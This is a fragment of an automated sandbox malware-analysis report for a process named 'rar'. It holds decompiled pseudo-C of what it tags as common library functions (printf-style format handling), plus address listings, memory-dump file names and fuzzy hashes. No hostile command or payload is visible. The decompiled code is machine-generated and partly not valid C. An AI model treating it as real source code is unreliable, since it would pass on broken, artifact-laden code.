				 *((long long*)(_t258 + 0x2c0)) =  >  ? _t266 : _t228;
				_t73 = _t258 + 8; // 0xe988
				_v48 = 0;
				_v56 = 0;
				E00007FF67FF650B35FB8(_t228 - _t266, _t204, _t73, _t250, _t258, _t279, _t256 + 0x3540, _t274, _t275);
				r8b =  *((intOrPtr*)(_t278 + 0x4618));
				_t205 = _a40;
				_t131 = E00007FF67FF650B5FCF0(0, _t205, _t205,  *((intOrPtr*)(_t278 + 0x4620)), _t256, _t258, _t260, _t279);
				 *((long long*)(_t205 + 0x4db8)) =  *((intOrPtr*)(_t278 + 0x4588));
				 *((char*)(_t205 + 0x4dd0)) = 0;
				E00007FF67FF650B49C04(_t131, _t35, _t205);
				_t195 =  *((intOrPtr*)(_t278 + 0x4580));
				 *((long long*)(_t258 + 0x220)) = _t195;
				 *((long long*)(_t258 + 0x218)) = _t195;
				r8d =  *(_t278 + 0x3538) & 0x000000ff;
				r8d = r8d - 1;
				E00007FF67FF650B49C04( *0x50b80550(), _t35, _t205);
				 *((char*)(_t205 + 0x4dc0)) = 0;
				E00007FF67FF650B5B008();
				 *((char*)(_t258 + 0x8c)) = 1;
				asm("dec ebp");
				if (E00007FF67FF650B3667C(_t205, _t278 + 0x4598, _t279 & _t278 + 0x000045f3, _t278 + 0x45f3) != 0) goto 0x50b15e6b;
				E00007FF67FF650B14AC0( *((intOrPtr*)(_t256 + 0x7f78)),  *((intOrPtr*)( *_t279 + 0x18)), _t205, _t256, _t274, _t275);
				goto 0x50b15e6b;
				 *0x50b80550();
				_t238 =  *((intOrPtr*)( *((intOrPtr*)(_t258 + 0x60)) + 0x10));
				if ( *((intOrPtr*)(_t256 + 0x4620)) - _t238 <= 0) goto 0x50b15e30;
				 *((long long*)(_t256 + 0x4620)) = _t238;
				 *((char*)(_t256 + 0x45c3)) =  *((intOrPtr*)(_t278 + 0x45c3));
				 *((char*)(_t256 + 0x45c8)) =  *((intOrPtr*)(_t278 + 0x45c8));
				_v56 = r12b;
				r9d = 0;
				r8d = 0;
				E00007FF67FF650B1B4D8(r13d,  *((intOrPtr*)(_t258 + 0x60)), _t256, _t256, _t279 & _t278 + 0x000045f3, _t274, _t275);
				return E00007FF67FF650B182C8(_t205, _t256, _t278, _t278 + 0x45f3);
			}


























                                                                                                            0x7ff650b15a44
                                                                                                            0x7ff650b15a44
                                                                                                            0x7ff650b15a44
                                                                                                            0x7ff650b15a44
                                                                                                            0x7ff650b15a44
                                                                                                            0x7ff650b15a44
                                                                                                            0x7ff650b15a49
                                                                                                            0x7ff650b15a4e
                                                                                                            0x7ff650b15a60
                                                                                                            0x7ff650b15a63
                                                                                                            0x7ff650b15a66
                                                                                                            0x7ff650b15a69
                                                                                                            0x7ff650b15a6c
                                                                                                            0x7ff650b15a78
                                                                                                            0x7ff650b15a7d
                                                                                                            0x7ff650b15a87
                                                                                                            0x7ff650b15a94
                                                                                                            0x7ff650b15a96
                                                                                                            0x7ff650b15aa0
                                                                                                            0x7ff650b15aac
                                                                                                            0x7ff650b15ab1
                                                                                                            0x7ff650b15ac2
                                                                                                            0x7ff650b15ac7
                                                                                                            0x7ff650b15ace
                                                                                                            0x7ff650b15ad5
                                                                                                            0x7ff650b15ae0
                                                                                                            0x7ff650b15ae8
                                                                                                            0x7ff650b15af6
                                                                                                            0x7ff650b15b07
                                                                                                            0x7ff650b15b0d
                                                                                                            0x7ff650b15b14
                                                                                                            0x7ff650b15b1c
                                                                                                            0x7ff650b15b28
                                                                                                            0x7ff650b15b2d
                                                                                                            0x7ff650b15b3a
                                                                                                            0x7ff650b15b45
                                                                                                            0x7ff650b15b54
                                                                                                            0x7ff650b15b61
                                                                                                            0x7ff650b15b74
                                                                                                            0x7ff650b15b7e
                                                                                                            0x7ff650b15b8f
                                                                                                            0x7ff650b15b96
                                                                                                            0x7ff650b15ba1
                                                                                                            0x7ff650b15baa
                                                                                                            0x7ff650b15bb1
                                                                                                            0x7ff650b15bbc
                                                                                                            0x7ff650b15bc1
                                                                                                            0x7ff650b15bcc
                                                                                                            0x7ff650b15bd7
                                                                                                            0x7ff650b15bdc
                                                                                                            0x7ff650b15be6
                                                                                                            0x7ff650b15bec
                                                                                                            0x7ff650b15bf1
                                                                                                            0x7ff650b15bf9
                                                                                                            0x7ff650b15c01
                                                                                                            0x7ff650b15c09
                                                                                                            0x7ff650b15c17
                                                                                                            0x7ff650b15c23
                                                                                                            0x7ff650b15c29
                                                                                                            0x7ff650b15c31
                                                                                                            0x7ff650b15c43
                                                                                                            0x7ff650b15c49
                                                                                                            0x7ff650b15c4c
                                                                                                            0x7ff650b15c5d
                                                                                                            0x7ff650b15c5f
                                                                                                            0x7ff650b15c66
                                                                                                            0x7ff650b15c70
                                                                                                            0x7ff650b15c72
                                                                                                            0x7ff650b15c79
                                                                                                            0x7ff650b15c8d
                                                                                                            0x7ff650b15c92
                                                                                                            0x7ff650b15c9c
                                                                                                            0x7ff650b15caa
                                                                                                            0x7ff650b15cb3
                                                                                                            0x7ff650b15cbd
                                                                                                            0x7ff650b15cc1
                                                                                                            0x7ff650b15cc9
                                                                                                            0x7ff650b15cce
                                                                                                            0x7ff650b15cd1
                                                                                                            0x7ff650b15cd8
                                                                                                            0x7ff650b15ce7
                                                                                                            0x7ff650b15cf8
                                                                                                            0x7ff650b15cfc
                                                                                                            0x7ff650b15d03
                                                                                                            0x7ff650b15d0a
                                                                                                            0x7ff650b15d0e
                                                                                                            0x7ff650b15d1c
                                                                                                            0x7ff650b15d20
                                                                                                            0x7ff650b15d25
                                                                                                            0x7ff650b15d2f
                                                                                                            0x7ff650b15d35
                                                                                                            0x7ff650b15d43
                                                                                                            0x7ff650b15d4e
                                                                                                            0x7ff650b15d5b
                                                                                                            0x7ff650b15d62
                                                                                                            0x7ff650b15d6f
                                                                                                            0x7ff650b15d74
                                                                                                            0x7ff650b15d7b
                                                                                                            0x7ff650b15d82
                                                                                                            0x7ff650b15d97
                                                                                                            0x7ff650b15d9f
                                                                                                            0x7ff650b15dba
                                                                                                            0x7ff650b15dbf
                                                                                                            0x7ff650b15dc6
                                                                                                            0x7ff650b15dcb
                                                                                                            0x7ff650b15de2
                                                                                                            0x7ff650b15df9
                                                                                                            0x7ff650b15e01
                                                                                                            0x7ff650b15e06
                                                                                                            0x7ff650b15e12
                                                                                                            0x7ff650b15e1c
                                                                                                            0x7ff650b15e27
                                                                                                            0x7ff650b15e29
                                                                                                            0x7ff650b15e37
                                                                                                            0x7ff650b15e44
                                                                                                            0x7ff650b15e4a
                                                                                                            0x7ff650b15e4f
                                                                                                            0x7ff650b15e52
                                                                                                            0x7ff650b15e5b
                                                                                                            0x7ff650b15e82

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID: 0-4008152959
                                                                                                            • Opcode ID: 08de7e9a3ce491af701597b6d3687df13733388a84b0e52fef695cf0d20edb9a
                                                                                                            • Instruction ID: f21b1ade33f5f2d8e1fafe906b4f82416c63857bccdd64dbc033a42137f3cccc
                                                                                                            • Opcode Fuzzy Hash: 08de7e9a3ce491af701597b6d3687df13733388a84b0e52fef695cf0d20edb9a
                                                                                                            • Instruction Fuzzy Hash: E9B1E3A2A08AC6A7EB18DB25E4847EEA760FB56B84F084131DF8E53752DF3DE155C304
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B70340 Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODECrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 58%
                                                                                                            			E00007FF67FF650B70340(long long __rbx, long long __rcx, long long __rsi, long long __rbp, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v48;
				short _v52;
				short _v56;
				long long _v72;
				void* __rdi;
				signed int _t72;
				void* _t74;
				void* _t105;
				void* _t116;
				unsigned int _t117;
				signed short _t118;
				unsigned int _t119;
				signed char _t126;
				void* _t131;
				void* _t136;
				void* _t137;
				void* _t138;
				signed long long _t176;
				void* _t191;
				void* _t193;
				signed long long _t194;
				intOrPtr* _t200;
				void* _t202;
				signed long long _t203;
				void* _t205;
				void* _t210;
				signed long long _t213;

				_t197 = __rsi;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t203 = _t202 - 0x40;
				_t176 =  *0x50b978f0; // 0x27db226282f1
				_v48 = _t176 ^ _t203;
				_t72 =  *(__rcx + 0x42) & 0x0000ffff;
				_t6 = _t197 - 0x17; // 0x41
				_t137 = _t6;
				_t7 = _t197 - 0x57; // 0x1
				r15d = _t7;
				_t138 = _t72 - 0x64;
				if (_t138 > 0) goto 0x50b703de;
				if (_t138 == 0) goto 0x50b7044f;
				if (_t72 == _t137) goto 0x50b70462;
				if (_t72 == 0x43) goto 0x50b703c8;
				if (_t72 - 0x44 <= 0) goto 0x50b7046b;
				if (_t72 - 0x47 <= 0) goto 0x50b70462;
				if (_t72 == 0x53) goto 0x50b7040b;
				if (_t72 == 0x58) goto 0x50b70420;
				if (_t72 == 0x5a) goto 0x50b703d4;
				if (_t72 == 0x61) goto 0x50b70462;
				if (_t72 != 0x63) goto 0x50b7046b;
				E00007FF67FF650B70C20(_t72 - 0x63, __rcx, __rcx, __rsi);
				goto 0x50b70467;
				_t74 = E00007FF67FF650B7068C(__rcx, __rcx, _t197);
				goto 0x50b70467;
				if (_t74 - 0x67 <= 0) goto 0x50b70462;
				if (_t74 == 0x69) goto 0x50b7044f;
				if (_t74 == 0x6e) goto 0x50b70448;
				if (_t74 == 0x6f) goto 0x50b7042a;
				if (_t74 == 0x70) goto 0x50b70412;
				if (_t74 == 0x73) goto 0x50b7040b;
				if (_t74 == 0x75) goto 0x50b70453;
				if (_t74 != 0x78) goto 0x50b7046b;
				goto 0x50b70458;
				E00007FF67FF650B70FD4(_t116, __rcx, __rcx, _t197);
				goto 0x50b70467;
				 *((intOrPtr*)(__rcx + 0x38)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0xb;
				r8b = r15b;
				goto 0x50b7045b;
				_t117 =  *(__rcx + 0x30);
				if ((r15b & _t117 >> 0x00000005) == 0) goto 0x50b7043e;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x30) = _t117;
				goto 0x50b70458;
				E00007FF67FF650B70E68(__rcx, __rcx, _t191, _t197);
				goto 0x50b70467;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000010;
				r8d = 0;
				E00007FF67FF650B70CC8(0xa, __rcx, _t205, _t210);
				goto 0x50b70467;
				if (E00007FF67FF650B70928(_t131, _t176 ^ _t203, __rcx, __rcx, _t193, _t197, __rbp, _t205) != 0) goto 0x50b70472;
				goto 0x50b705de;
				if ( *((char*)(__rcx + 0x40)) != 0) goto 0x50b705db;
				_t126 =  *(__rcx + 0x30);
				_v56 = 0;
				_v52 = 0;
				_t21 = _t193 + 0x20; // 0x20
				r13d = _t21;
				if ((r15b & 0) == 0) goto 0x50b704cc;
				if ((r15b & 0) == 0) goto 0x50b704ae;
				_t26 = _t193 + 0x2d; // 0x2d
				_v56 = _t26;
				goto 0x50b704c9;
				if ((r15b & _t126) == 0) goto 0x50b704ba;
				goto 0x50b704a7;
				if ((r15b & 0) == 0) goto 0x50b704cc;
				_v56 = r13w;
				_t194 = _t213;
				_t118 =  *(__rcx + 0x42) & 0x0000ffff;
				r9d = 0xffdf;
				if ((r9w & (_t118 & 0x0000ffff) - 0x00000058) != 0) goto 0x50b704f1;
				if ((r15b & 0) == 0) goto 0x50b704f1;
				r8b = r15b;
				goto 0x50b704f4;
				r8b = 0;
				r12d = 0x30;
				if (r8b != 0) goto 0x50b70510;
				if (0 == 0) goto 0x50b7053f;
				 *((intOrPtr*)(_t203 + 0x30 + _t194 * 2)) = r12w;
				if (_t118 == 0x58) goto 0x50b70527;
				if (_t118 == _t137) goto 0x50b70527;
				goto 0x50b7052a;
				asm("sbb al, al");
				 *((short*)(_t203 + 0x30 + (_t194 + _t213) * 2)) = ( ~r15b & 0x000000e0) + 0x78;
				_t136 =  *((intOrPtr*)(__rcx + 0x34)) -  *((intOrPtr*)(__rcx + 0x50));
				if ((_t126 & 0x0000000c) != 0) goto 0x50b70562;
				r8d = _t136;
				_t105 = E00007FF67FF650B6F4A8(( ~r15b & 0x000000e0) + 0x78, r13b, __rcx, __rcx + 0x468, _t194 + _t213 + _t213, __rcx + 0x28);
				_t200 = __rcx + 0x28;
				_v72 =  *((intOrPtr*)(__rcx + 0x10));
				r8d = 0;
				E00007FF67FF650B71320(_t105, _t137, __rcx, __rcx + 0x468, _t197, _t200, _t200);
				_t119 =  *(__rcx + 0x30);
				if ((r15b & _t119 >> 0x00000003) == 0) goto 0x50b705af;
				if ((r15b & _t119 >> 0x00000002) != 0) goto 0x50b705af;
				r8d = _t136;
				E00007FF67FF650B6F4A8(_t119 >> 3, r12b, __rcx, __rcx + 0x468, _t194 + _t213 + _t213, _t200);
				E00007FF67FF650B71174(__rcx, __rcx, _t197, _t200);
				if ( *_t200 < 0) goto 0x50b705db;
				if ((r15b &  *(__rcx + 0x30) >> 0x00000002) == 0) goto 0x50b705db;
				r8d = _t136;
				E00007FF67FF650B6F4A8( *(__rcx + 0x30) >> 2, r13b, __rcx, __rcx + 0x468, _t194 + _t213 + _t213, _t200);
				return E00007FF67FF650B69D10(r15b, _t119 >> 2, _v48 ^ _t203);
			}































                                                                                                            0x7ff650b70340
                                                                                                            0x7ff650b70340
                                                                                                            0x7ff650b70345
                                                                                                            0x7ff650b7034a
                                                                                                            0x7ff650b70358
                                                                                                            0x7ff650b7035c
                                                                                                            0x7ff650b70366
                                                                                                            0x7ff650b7036b
                                                                                                            0x7ff650b70377
                                                                                                            0x7ff650b70377
                                                                                                            0x7ff650b7037a
                                                                                                            0x7ff650b7037a
                                                                                                            0x7ff650b7037e
                                                                                                            0x7ff650b70381
                                                                                                            0x7ff650b70383
                                                                                                            0x7ff650b7038b
                                                                                                            0x7ff650b70394
                                                                                                            0x7ff650b70399
                                                                                                            0x7ff650b703a2
                                                                                                            0x7ff650b703ab
                                                                                                            0x7ff650b703af
                                                                                                            0x7ff650b703b4
                                                                                                            0x7ff650b703b9
                                                                                                            0x7ff650b703c2
                                                                                                            0x7ff650b703ca
                                                                                                            0x7ff650b703cf
                                                                                                            0x7ff650b703d4
                                                                                                            0x7ff650b703d9
                                                                                                            0x7ff650b703e1
                                                                                                            0x7ff650b703e6
                                                                                                            0x7ff650b703eb
                                                                                                            0x7ff650b703f0
                                                                                                            0x7ff650b703f5
                                                                                                            0x7ff650b703fa
                                                                                                            0x7ff650b703ff
                                                                                                            0x7ff650b70404
                                                                                                            0x7ff650b70409
                                                                                                            0x7ff650b7040b
                                                                                                            0x7ff650b70410
                                                                                                            0x7ff650b70412
                                                                                                            0x7ff650b70419
                                                                                                            0x7ff650b70420
                                                                                                            0x7ff650b70428
                                                                                                            0x7ff650b7042a
                                                                                                            0x7ff650b70435
                                                                                                            0x7ff650b70437
                                                                                                            0x7ff650b7043b
                                                                                                            0x7ff650b70446
                                                                                                            0x7ff650b70448
                                                                                                            0x7ff650b7044d
                                                                                                            0x7ff650b7044f
                                                                                                            0x7ff650b70458
                                                                                                            0x7ff650b7045b
                                                                                                            0x7ff650b70460
                                                                                                            0x7ff650b70469
                                                                                                            0x7ff650b7046d
                                                                                                            0x7ff650b70476
                                                                                                            0x7ff650b7047c
                                                                                                            0x7ff650b70481
                                                                                                            0x7ff650b70487
                                                                                                            0x7ff650b70491
                                                                                                            0x7ff650b70491
                                                                                                            0x7ff650b70498
                                                                                                            0x7ff650b704a2
                                                                                                            0x7ff650b704a4
                                                                                                            0x7ff650b704a7
                                                                                                            0x7ff650b704ac
                                                                                                            0x7ff650b704b1
                                                                                                            0x7ff650b704b8
                                                                                                            0x7ff650b704c1
                                                                                                            0x7ff650b704c3
                                                                                                            0x7ff650b704c9
                                                                                                            0x7ff650b704cc
                                                                                                            0x7ff650b704d0
                                                                                                            0x7ff650b704e0
                                                                                                            0x7ff650b704ea
                                                                                                            0x7ff650b704ec
                                                                                                            0x7ff650b704ef
                                                                                                            0x7ff650b704f1
                                                                                                            0x7ff650b704f7
                                                                                                            0x7ff650b7050a
                                                                                                            0x7ff650b7050e
                                                                                                            0x7ff650b70510
                                                                                                            0x7ff650b7051c
                                                                                                            0x7ff650b70521
                                                                                                            0x7ff650b70525
                                                                                                            0x7ff650b7052c
                                                                                                            0x7ff650b70537
                                                                                                            0x7ff650b70545
                                                                                                            0x7ff650b7054a
                                                                                                            0x7ff650b70550
                                                                                                            0x7ff650b7055d
                                                                                                            0x7ff650b70566
                                                                                                            0x7ff650b70571
                                                                                                            0x7ff650b70581
                                                                                                            0x7ff650b70584
                                                                                                            0x7ff650b70589
                                                                                                            0x7ff650b70594
                                                                                                            0x7ff650b7059c
                                                                                                            0x7ff650b705a1
                                                                                                            0x7ff650b705aa
                                                                                                            0x7ff650b705b4
                                                                                                            0x7ff650b705bd
                                                                                                            0x7ff650b705c8
                                                                                                            0x7ff650b705cd
                                                                                                            0x7ff650b705d6
                                                                                                            0x7ff650b70608

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 3215553584-4108050209
                                                                                                            • Opcode ID: c97b0bdfcda578dfd4de4dd1aa2de967b035bdd21ecbc5226c58b35a85dfd190
                                                                                                            • Instruction ID: f5969f07101fd1e8726d8fd080200e94e1fb8aedd017fe7db11fa52e5d8b2cc0
                                                                                                            • Opcode Fuzzy Hash: c97b0bdfcda578dfd4de4dd1aa2de967b035bdd21ecbc5226c58b35a85dfd190
                                                                                                            • Instruction Fuzzy Hash: EA81C322A38643E6EBA88A1590C057E33A0EF42B44F5C1537DE0BF7795DE2FE8469741
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B700C4 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODECrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E00007FF67FF650B700C4(void* __rax, long long __rbx, long long __rcx, long long __rsi, long long __rbp, char _a8, char _a10, long long _a16, long long _a24, long long _a32) {
				long long _v40;
				void* __rdi;
				char _t66;
				void* _t68;
				void* _t94;
				unsigned int _t104;
				intOrPtr _t105;
				unsigned int _t106;
				signed char _t113;
				void* _t118;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t161;
				void* _t173;
				void* _t175;
				intOrPtr* _t181;
				void* _t183;
				void* _t184;
				void* _t186;
				void* _t191;
				void* _t193;

				_t178 = __rsi;
				_t161 = __rax;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t184 = _t183 - 0x30;
				_t66 =  *((char*)(__rcx + 0x41));
				r15d = 1;
				_t124 = _t66 - 0x64;
				if (_t124 > 0) goto 0x50b7014b;
				if (_t124 == 0) goto 0x50b701bc;
				if (_t66 == 0x41) goto 0x50b701cf;
				if (_t66 == 0x43) goto 0x50b70135;
				if (_t66 - 0x44 <= 0) goto 0x50b701d8;
				if (_t66 - 0x47 <= 0) goto 0x50b701cf;
				if (_t66 == 0x53) goto 0x50b70178;
				if (_t66 == 0x58) goto 0x50b7018d;
				if (_t66 == 0x5a) goto 0x50b70141;
				if (_t66 == 0x61) goto 0x50b701cf;
				if (_t66 != 0x63) goto 0x50b701d8;
				E00007FF67FF650B70B6C(_t66 - 0x63, __rcx, __rcx);
				goto 0x50b701d4;
				_t68 = E00007FF67FF650B7060C(__rcx, __rcx, __rsi);
				goto 0x50b701d4;
				if (_t68 - 0x67 <= 0) goto 0x50b701cf;
				if (_t68 == 0x69) goto 0x50b701bc;
				if (_t68 == 0x6e) goto 0x50b701b5;
				if (_t68 == 0x6f) goto 0x50b70197;
				if (_t68 == 0x70) goto 0x50b7017f;
				if (_t68 == 0x73) goto 0x50b70178;
				if (_t68 == 0x75) goto 0x50b701c0;
				if (_t68 != 0x78) goto 0x50b701d8;
				goto 0x50b701c5;
				E00007FF67FF650B70F44(__rcx, __rcx, _t178);
				goto 0x50b701d4;
				 *((intOrPtr*)(__rcx + 0x38)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0xb;
				r8b = r15b;
				goto 0x50b701c8;
				_t104 =  *(__rcx + 0x30);
				if ((r15b & _t104 >> 0x00000005) == 0) goto 0x50b701ab;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x30) = _t104;
				goto 0x50b701c5;
				E00007FF67FF650B70E68(__rcx, __rcx, _t173, _t178);
				goto 0x50b701d4;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000010;
				r8d = 0;
				E00007FF67FF650B70CC8(0xa, __rcx, _t186, _t191);
				goto 0x50b701d4;
				if (E00007FF67FF650B7070C(_t118, _t161, __rcx, __rcx, _t178, __rbp, _t186) != 0) goto 0x50b701df;
				goto 0x50b70324;
				if ( *((char*)(__rcx + 0x40)) != 0) goto 0x50b70321;
				_t113 =  *(__rcx + 0x30);
				_a8 = 0;
				_a10 = 0;
				if ((r15b & 0) == 0) goto 0x50b70231;
				if ((r15b & 0) == 0) goto 0x50b70214;
				_a8 = 0x2d;
				goto 0x50b7022e;
				if ((r15b & _t113) == 0) goto 0x50b70220;
				_a8 = 0x2b;
				goto 0x50b7022e;
				if ((r15b & 0) == 0) goto 0x50b70231;
				_a8 = 0x20;
				_t175 = _t193;
				_t105 =  *((intOrPtr*)(__rcx + 0x41));
				if (0 != 0) goto 0x50b7024a;
				if ((r15b & 0) == 0) goto 0x50b7024a;
				r8b = r15b;
				goto 0x50b7024d;
				r8b = 0;
				if (r8b != 0) goto 0x50b7025e;
				if (0 == 0) goto 0x50b70288;
				 *((char*)(_t184 + _t175 + 0x50)) = 0x30;
				if (_t105 == 0x58) goto 0x50b70274;
				if (_t105 == 0x41) goto 0x50b70274;
				goto 0x50b70277;
				asm("sbb al, al");
				 *((char*)(_t184 + _t175 + _t193 + 0x50)) = ( ~r15b & 0x000000e0) + 0x78;
				_t122 =  *((intOrPtr*)(__rcx + 0x34)) -  *((intOrPtr*)(__rcx + 0x50));
				if ((_t113 & 0x0000000c) != 0) goto 0x50b702aa;
				r8d = _t122;
				_t94 = E00007FF67FF650B6F44C(( ~r15b & 0x000000e0) + 0x78, 0x20, __rcx, __rcx + 0x468, __rcx + 0x28);
				_t181 = __rcx + 0x28;
				_v40 =  *((intOrPtr*)(__rcx + 0x10));
				r8d = 0;
				E00007FF67FF650B71264(_t94, _t122, _t123, __rcx, __rcx + 0x468, _t175 + _t193 + _t193, _t178, _t181, _t181);
				_t106 =  *(__rcx + 0x30);
				if ((r15b & _t106 >> 0x00000003) == 0) goto 0x50b702f6;
				if ((r15b & _t106 >> 0x00000002) != 0) goto 0x50b702f6;
				r8d = _t122;
				E00007FF67FF650B6F44C(_t106 >> 3, 0x30, __rcx, __rcx + 0x468, _t181);
				E00007FF67FF650B7109C(__rcx, __rcx, _t178);
				if ( *_t181 < 0) goto 0x50b70321;
				if ((r15b &  *(__rcx + 0x30) >> 0x00000002) == 0) goto 0x50b70321;
				r8d = _t122;
				E00007FF67FF650B6F44C( *(__rcx + 0x30) >> 2, 0x20, __rcx, __rcx + 0x468, _t181);
				return r15b;
			}

























                                                                                                            0x7ff650b700c4
                                                                                                            0x7ff650b700c4
                                                                                                            0x7ff650b700c4
                                                                                                            0x7ff650b700c9
                                                                                                            0x7ff650b700ce
                                                                                                            0x7ff650b700d8
                                                                                                            0x7ff650b700dc
                                                                                                            0x7ff650b700e3
                                                                                                            0x7ff650b700e9
                                                                                                            0x7ff650b700ec
                                                                                                            0x7ff650b700ee
                                                                                                            0x7ff650b700f7
                                                                                                            0x7ff650b70100
                                                                                                            0x7ff650b70105
                                                                                                            0x7ff650b7010e
                                                                                                            0x7ff650b70117
                                                                                                            0x7ff650b7011c
                                                                                                            0x7ff650b70121
                                                                                                            0x7ff650b70126
                                                                                                            0x7ff650b7012f
                                                                                                            0x7ff650b70137
                                                                                                            0x7ff650b7013c
                                                                                                            0x7ff650b70141
                                                                                                            0x7ff650b70146
                                                                                                            0x7ff650b7014e
                                                                                                            0x7ff650b70153
                                                                                                            0x7ff650b70158
                                                                                                            0x7ff650b7015d
                                                                                                            0x7ff650b70162
                                                                                                            0x7ff650b70167
                                                                                                            0x7ff650b7016c
                                                                                                            0x7ff650b70171
                                                                                                            0x7ff650b70176
                                                                                                            0x7ff650b70178
                                                                                                            0x7ff650b7017d
                                                                                                            0x7ff650b7017f
                                                                                                            0x7ff650b70186
                                                                                                            0x7ff650b7018d
                                                                                                            0x7ff650b70195
                                                                                                            0x7ff650b70197
                                                                                                            0x7ff650b701a2
                                                                                                            0x7ff650b701a4
                                                                                                            0x7ff650b701a8
                                                                                                            0x7ff650b701b3
                                                                                                            0x7ff650b701b5
                                                                                                            0x7ff650b701ba
                                                                                                            0x7ff650b701bc
                                                                                                            0x7ff650b701c5
                                                                                                            0x7ff650b701c8
                                                                                                            0x7ff650b701cd
                                                                                                            0x7ff650b701d6
                                                                                                            0x7ff650b701da
                                                                                                            0x7ff650b701e3
                                                                                                            0x7ff650b701e9
                                                                                                            0x7ff650b701ee
                                                                                                            0x7ff650b701f5
                                                                                                            0x7ff650b70201
                                                                                                            0x7ff650b7020b
                                                                                                            0x7ff650b7020d
                                                                                                            0x7ff650b70212
                                                                                                            0x7ff650b70217
                                                                                                            0x7ff650b70219
                                                                                                            0x7ff650b7021e
                                                                                                            0x7ff650b70227
                                                                                                            0x7ff650b70229
                                                                                                            0x7ff650b7022e
                                                                                                            0x7ff650b70231
                                                                                                            0x7ff650b70239
                                                                                                            0x7ff650b70243
                                                                                                            0x7ff650b70245
                                                                                                            0x7ff650b70248
                                                                                                            0x7ff650b7024a
                                                                                                            0x7ff650b70258
                                                                                                            0x7ff650b7025c
                                                                                                            0x7ff650b7025e
                                                                                                            0x7ff650b70269
                                                                                                            0x7ff650b7026e
                                                                                                            0x7ff650b70272
                                                                                                            0x7ff650b70279
                                                                                                            0x7ff650b70281
                                                                                                            0x7ff650b7028e
                                                                                                            0x7ff650b70293
                                                                                                            0x7ff650b70299
                                                                                                            0x7ff650b702a5
                                                                                                            0x7ff650b702ae
                                                                                                            0x7ff650b702b9
                                                                                                            0x7ff650b702c9
                                                                                                            0x7ff650b702cc
                                                                                                            0x7ff650b702d1
                                                                                                            0x7ff650b702dc
                                                                                                            0x7ff650b702e4
                                                                                                            0x7ff650b702e9
                                                                                                            0x7ff650b702f1
                                                                                                            0x7ff650b702fb
                                                                                                            0x7ff650b70304
                                                                                                            0x7ff650b7030f
                                                                                                            0x7ff650b70314
                                                                                                            0x7ff650b7031c
